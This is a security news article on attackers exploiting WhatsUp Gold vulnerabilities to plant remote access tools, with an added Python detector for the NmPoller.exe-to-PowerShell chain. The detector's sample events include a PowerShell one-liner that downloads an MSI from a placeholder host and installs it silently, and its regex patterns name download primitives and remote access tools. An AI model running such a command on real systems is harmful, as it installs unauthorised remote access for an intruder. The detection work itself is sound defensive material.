Malicious actors may be leveraging publicly available proof-of-concept (PoC) exploits for recently disclosed security flaws in Progress Software WhatsUp Gold to carry out opportunistic attacks.
The campaign is said to have begun on August 30, 2024, just five hours after Summoning Team security researcher Sina Kheirkhah, who also discovered and reported CVE-2024-6671 (CVSS score: 9.8), released a PoC for CVE-2024-6670 (CVSS score: 9.8).
Both critical vulnerabilities allow unauthenticated attackers to retrieve users' encrypted passwords; Progress patched them in mid-August 2024.
“The timeline of events indicates that even though patches were available, some organizations failed to apply them quickly enough, leading to incidents shortly after the PoC was released,” Trend Micro researchers Hitomi Kimura and Maria Emreen Belay said in an analysis on Thursday.
The attacks observed by the cybersecurity firm involve bypassing WhatsUp Gold authentication and then abusing the product's Active Monitor PowerShell scripts to download several remote access tools, giving the attackers persistence on the Windows host.
This includes Atera Agent, Radmin, SimpleHelp Remote Access, and Splashtop Remote, with both Atera Agent and Splashtop Remote installed by a single MSI installer file retrieved from a remote server.
“WhatsUp Gold’s executable polling process, NmPoller.exe, appears to be capable of hosting a script called Active Monitor PowerShell Script as a legitimate function,” the researchers explained. “The threat actors in this case chose to do this to perform remote arbitrary code execution.”
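The chain described above (NmPoller.exe hosting a PowerShell script, the script fetching an MSI, the MSI installing a remote access agent) leaves a recognisable shape in process-creation telemetry. The detector below is an added example, not code from the article or from Trend Micro: it scores Sysmon Event ID 1 style records (ProcessGuid, ParentProcessGuid, Image, ParentImage, CommandLine) that sit anywhere under NmPoller.exe in the process tree. The WhatsUp Gold and Atera install paths, the GUIDs and the 203.0.113.5 TEST-NET address in the sample events are constructed.

```python
"""Detection sketch for the NmPoller.exe -> PowerShell -> remote access tool chain.

Added example, not code from the article or from Trend Micro. Assumptions:
  * events carry Sysmon Event ID 1 style fields: ProcessGuid, ParentProcessGuid,
    Image, ParentImage, CommandLine
  * the install paths, GUIDs and IP address below are constructed sample data
"""
import re
from dataclasses import dataclass, field

POLLER = "nmpoller.exe"
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}

# Fetch-and-run primitives typical of "download an installer, then execute it" one-liners.
DOWNLOAD_RE = re.compile(
    r"invoke-webrequest|\biwr\b|downloadstring|downloadfile|start-bitstransfer"
    r"|\bcurl\b|\bwget\b|msiexec(\.exe)?\s.*?/i\s+https?://",
    re.IGNORECASE,
)
# Remote access tools named in the Trend Micro analysis (case-insensitive substring match).
RAT_RE = re.compile(r"atera|radmin|simplehelp|splashtop", re.IGNORECASE)


def basename(path: str) -> str:
    """Last path component, lower-cased; accepts Windows or POSIX separators."""
    return re.split(r"[\\/]", path)[-1].lower()


@dataclass
class Finding:
    index: int                                   # position of the event in the input list
    severity: str                                # "low" or "high"
    reasons: list[str] = field(default_factory=list)


def under_poller(ev: dict, by_guid: dict, max_depth: int = 16) -> bool:
    """True if NmPoller.exe is the parent or any ancestor (walks ParentProcessGuid)."""
    depth = 0
    while ev is not None and depth < max_depth:
        if basename(ev.get("ParentImage", "")) == POLLER:
            return True
        ev = by_guid.get(ev.get("ParentProcessGuid"))
        depth += 1
    return False


def analyze(events: list[dict]) -> list[Finding]:
    """Score every process-creation event that sits below NmPoller.exe in the process tree."""
    by_guid = {ev["ProcessGuid"]: ev for ev in events}
    findings = []
    for i, ev in enumerate(events):
        if not under_poller(ev, by_guid):
            continue  # scoped to the poller's subtree so ordinary admin activity stays out
        image = basename(ev.get("Image", ""))
        parent = basename(ev.get("ParentImage", ""))
        cmd = ev.get("CommandLine", "")
        reasons, severity = [], "low"
        # Active Monitor scripts make a shell under the poller expected; alone this is only "low".
        if parent == POLLER and image in SHELLS:
            reasons.append(f"NmPoller.exe spawned {image}")
        if DOWNLOAD_RE.search(cmd):
            reasons.append("download primitive in command line")
            severity = "high"
        if image == "msiexec.exe":
            reasons.append("MSI installer executed under the poller")
            severity = "high"
        if RAT_RE.search(image) or RAT_RE.search(cmd):
            reasons.append("remote access tool referenced")
            severity = "high"
        if reasons:
            findings.append(Finding(i, severity, reasons))
    return findings


# Constructed sample telemetry (not real logs). 203.0.113.5 is a TEST-NET address.
WUG = r"C:\Program Files (x86)\Ipswitch\WhatsUp"   # assumed install directory
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"ProcessGuid": "g1", "ParentProcessGuid": "g0", "Image": WUG + r"\NmPoller.exe",
     "ParentImage": r"C:\Windows\System32\services.exe", "CommandLine": "NmPoller.exe"},
    {"ProcessGuid": "g2", "ParentProcessGuid": "g1", "Image": PS, "ParentImage": WUG + r"\NmPoller.exe",
     "CommandLine": "powershell.exe -NoProfile -Command Get-Service W3SVC"},
    {"ProcessGuid": "g3", "ParentProcessGuid": "g1", "Image": PS, "ParentImage": WUG + r"\NmPoller.exe",
     "CommandLine": ("powershell.exe -ep bypass -c Invoke-WebRequest -Uri http://203.0.113.5/agent.msi "
                     r"-OutFile C:\Windows\Temp\agent.msi; msiexec /i C:\Windows\Temp\agent.msi /qn")},
    {"ProcessGuid": "g4", "ParentProcessGuid": "g3", "Image": r"C:\Windows\System32\msiexec.exe",
     "ParentImage": PS, "CommandLine": r"msiexec /i C:\Windows\Temp\agent.msi /qn"},
    {"ProcessGuid": "g5", "ParentProcessGuid": "g4",
     "Image": r"C:\Program Files\ATERA Networks\AteraAgent\AteraAgent.exe",
     "ParentImage": r"C:\Windows\System32\msiexec.exe", "CommandLine": "AteraAgent.exe"},
    {"ProcessGuid": "g6", "ParentProcessGuid": "g9", "Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe -c Invoke-WebRequest -Uri http://203.0.113.5/x -OutFile x"},
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"event {f.index}: {f.severity}: " + "; ".join(f.reasons))
```

Two design choices matter here. First, the "poller spawned a shell" rule alone is only low severity, because the quoted analysis notes that hosting an Active Monitor PowerShell script is a legitimate NmPoller.exe function; it becomes high only when a download primitive, an MSI installation or one of the named remote access tools appears in the same subtree. Second, the last sample event (an identical download one-liner launched from explorer.exe) is deliberately left unflagged: the detector is scoped to the poller's process tree, and a production rule would pair it with a separate generic download-cradle detection rather than widen this one.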
No follow-on activity has been detected so far; however, the use of multiple remote access tools suggests a ransomware actor is responsible.
This is the second time a WhatsUp Gold security vulnerability has been weaponized in the wild: Early last month, the Shadowserver Foundation announced that it had seen exploitation attempts against CVE-2024-4885 (CVSS score: 9.8), another critical bug that was resolved by Progress in June 2024.
This disclosure comes a few weeks after Trend Micro revealed that threat actors were exploiting a security flaw in Atlassian’s Confluence Data Center and Confluence Server (CVE-2023-22527, CVSS score: 10.0) to deliver the Godzilla web shell. The vulnerability has since been patched.
“The CVE-2023-22527 vulnerability continues to be widely exploited by a variety of threat actors who leverage this vulnerability to carry out malicious activities, posing a significant security risk to organizations worldwide,” the company said.